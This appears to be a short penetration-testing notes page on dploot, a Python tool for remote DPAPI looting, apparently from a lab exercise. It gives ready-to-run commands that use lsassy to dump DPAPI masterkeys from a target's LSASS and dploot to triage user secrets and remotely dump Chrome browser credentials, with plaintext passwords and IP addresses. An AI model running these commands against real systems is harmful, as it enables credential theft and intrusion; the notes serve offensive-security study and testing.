dploot

DPAPI looting remotely in Python

dploot is Python rewrite of SharpDPAPI written un C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.

Not as a domain administrator

If domain admin privileges have not been obtained (yet), use lsassy to harvest decrypted masterkeys:

lsassy -u Administrator -p 8WA4q0pm 10.10.121.107 -m rdrleakdiag -M masterkeys

Then you can use this masterkey file to loot the targeted computer, for example with User Triage commands:

dploot triage -u Administrator -p 8WA4q0pm 10.10.121.107 -mkfile DPAPI/masterkeys -debug

Dumping browser (Google Chrome) credentials

Using the same methodology we can also remotely dump browser credentials.

First gather masterkeys as shown above. Then do the following:

./dploot_linux_adm64 browser -d zsm.local -u JAMIE -p Password123\! 192.168.210.11 -mkfile /home/kali/Documents/Zephyr/loot/masterkeys -debug

Tooling

Last updated 8 months ago

hashtagNot as a domain administrator

hashtagDumping browser (Google Chrome) credentials

hashtagTooling

Not as a domain administrator

Dumping browser (Google Chrome) credentials

Tooling